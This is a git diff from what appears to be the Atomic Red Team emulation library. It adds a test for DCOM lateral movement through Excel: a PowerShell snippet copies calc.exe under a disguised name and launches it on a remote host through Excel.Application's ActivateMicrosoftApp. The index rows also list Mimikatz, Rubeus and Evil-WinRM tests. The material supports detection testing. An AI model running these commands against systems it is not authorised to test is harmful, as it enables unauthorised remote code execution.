Merge branch 'master' into clr2of8-patch-59

atomics/Indexes/Indexes-CSV/index.csv

@@ -1305,6 +1305,7 @@ lateral-movement,T1021.006,Remote Services: Windows Remote Management,1,Enable W
 lateral-movement,T1021.006,Remote Services: Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
 lateral-movement,T1021.006,Remote Services: Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
 lateral-movement,T1021.003,Remote Services: Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
+lateral-movement,T1021.003,Remote Services: Distributed Component Object Model,2,PowerShell Lateral Movement Using Excel Application Object,505f24be-1c11-4694-b614-e01ae1cd2570,powershell
 lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
 lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
 lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -829,6 +829,7 @@ lateral-movement,T1021.006,Remote Services: Windows Remote Management,1,Enable W
 lateral-movement,T1021.006,Remote Services: Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
 lateral-movement,T1021.006,Remote Services: Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
 lateral-movement,T1021.003,Remote Services: Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
+lateral-movement,T1021.003,Remote Services: Distributed Component Object Model,2,PowerShell Lateral Movement Using Excel Application Object,505f24be-1c11-4694-b614-e01ae1cd2570,powershell
 lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
 lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
 lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -2020,6 +2020,7 @@
   - Atomic Test #3: WinRM Access with Evil-WinRM [windows]
 - [T1021.003 Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md)
   - Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows]
+  - Atomic Test #2: PowerShell Lateral Movement Using Excel Application Object [windows]
 - T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1550.003 Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md)
   - Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -1365,6 +1365,7 @@
   - Atomic Test #3: WinRM Access with Evil-WinRM [windows]
 - [T1021.003 Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md)
   - Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows]
+  - Atomic Test #2: PowerShell Lateral Movement Using Excel Application Object [windows]
 - T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1550.003 Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md)
   - Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]

atomics/Indexes/index.yaml

@@ -89270,6 +89270,50 @@ lateral-movement:
 
           '
         name: powershell
+    - name: PowerShell Lateral Movement Using Excel Application Object
+      auto_generated_guid: 505f24be-1c11-4694-b614-e01ae1cd2570
+      description: |
+        Powershell lateral movement using the Excel COM objects.
+
+        Reference:
+
+        https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922
+
+        Upon successful execution, cmd will spawn calc.exe on a remote computer.
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: 'Microsoft Excel must be installed
+
+          '
+        prereq_command: |
+          try {
+            New-Object -COMObject "Excel.Application" | Out-Null
+            Stop-Process -Name "Excel"
+            exit 0
+          } catch { exit 1 }
+        get_prereq_command: 'Write-Host "You will need to install Microsoft Excel
+          manually to meet this requirement"
+
+          '
+        cleanup_command: 'Remove-Item ''C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe''
+
+          '
+      input_arguments:
+        computer_name:
+          description: Hostname or IP
+          type: string
+          default: localhost
+        user:
+          description: Name of user
+          type: string
+          default: admin
+      executor:
+        command: |
+          copy c:\windows\system32\calc.exe 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
+          $com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","#{computer_name}"))
+          $com.ActivateMicrosoftApp("5")
+        name: powershell
   T1175:
     technique:
       x_mitre_platforms:

atomics/Indexes/windows-index.yaml

@@ -74880,6 +74880,50 @@ lateral-movement:
 
           '
         name: powershell
+    - name: PowerShell Lateral Movement Using Excel Application Object
+      auto_generated_guid: 505f24be-1c11-4694-b614-e01ae1cd2570
+      description: |
+        Powershell lateral movement using the Excel COM objects.
+
+        Reference:
+
+        https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922
+
+        Upon successful execution, cmd will spawn calc.exe on a remote computer.
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: 'Microsoft Excel must be installed
+
+          '
+        prereq_command: |
+          try {
+            New-Object -COMObject "Excel.Application" | Out-Null
+            Stop-Process -Name "Excel"
+            exit 0
+          } catch { exit 1 }
+        get_prereq_command: 'Write-Host "You will need to install Microsoft Excel
+          manually to meet this requirement"
+
+          '
+        cleanup_command: 'Remove-Item ''C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe''
+
+          '
+      input_arguments:
+        computer_name:
+          description: Hostname or IP
+          type: string
+          default: localhost
+        user:
+          description: Name of user
+          type: string
+          default: admin
+      executor:
+        command: |
+          copy c:\windows\system32\calc.exe 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
+          $com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","#{computer_name}"))
+          $com.ActivateMicrosoftApp("5")
+        name: powershell
   T1175:
     technique:
       x_mitre_platforms:

atomics/T1021.003/T1021.003.md

@@ -12,6 +12,8 @@ Through DCOM, adversaries operating in the context of an appropriately privilege
 
 - [Atomic Test #1 - PowerShell Lateral Movement using MMC20](#atomic-test-1---powershell-lateral-movement-using-mmc20)
 
+- [Atomic Test #2 - PowerShell Lateral Movement Using Excel Application Object](#atomic-test-2---powershell-lateral-movement-using-excel-application-object)
+
 
 <br/>
 
@@ -51,4 +53,62 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - PowerShell Lateral Movement Using Excel Application Object
+Powershell lateral movement using the Excel COM objects.
+
+Reference:
+
+https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922
+
+Upon successful execution, cmd will spawn calc.exe on a remote computer.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 505f24be-1c11-4694-b614-e01ae1cd2570
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| computer_name | Hostname or IP | string | localhost|
+| user | Name of user | string | admin|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+copy c:\windows\system32\calc.exe 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
+$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","#{computer_name}"))
+$com.ActivateMicrosoftApp("5")
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Microsoft Excel must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+  New-Object -COMObject "Excel.Application" | Out-Null
+  Stop-Process -Name "Excel"
+  exit 0
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
+```
+
+
+
+
 <br/>

atomics/T1021.003/T1021.003.yaml

@@ -22,3 +22,43 @@ atomic_tests:
     command: |
       [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
     name: powershell
+- name: PowerShell Lateral Movement Using Excel Application Object
+  auto_generated_guid: 505f24be-1c11-4694-b614-e01ae1cd2570
+  description: |
+    Powershell lateral movement using the Excel COM objects.
+
+    Reference:
+
+    https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922
+
+    Upon successful execution, cmd will spawn calc.exe on a remote computer.
+  supported_platforms:
+  - windows
+  dependencies:
+  - description: |
+      Microsoft Excel must be installed
+    prereq_command: |
+      try {
+        New-Object -COMObject "Excel.Application" | Out-Null
+        Stop-Process -Name "Excel"
+        exit 0
+      } catch { exit 1 }
+    get_prereq_command: |
+      Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
+    cleanup_command: |
+      Remove-Item 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
+  input_arguments:
+    computer_name:
+      description: Hostname or IP
+      type: string
+      default: localhost
+    user:
+      description: Name of user
+      type: string
+      default: admin
+  executor:
+    command: |
+      copy c:\windows\system32\calc.exe 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
+      $com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","#{computer_name}"))
+      $com.ActivateMicrosoftApp("5")
+    name: powershell

atomics/used_guids.txt

@@ -1496,3 +1496,4 @@ cedaf7e7-28ee-42ab-ba13-456abd35d1bd
 6b8ca3ab-5980-4321-80c3-bcd77c8daed8
 a9030b20-dd4b-4405-875e-3462c6078fdc
 704333ca-cc12-4bcf-9916-101844881f54
+505f24be-1c11-4694-b614-e01ae1cd2570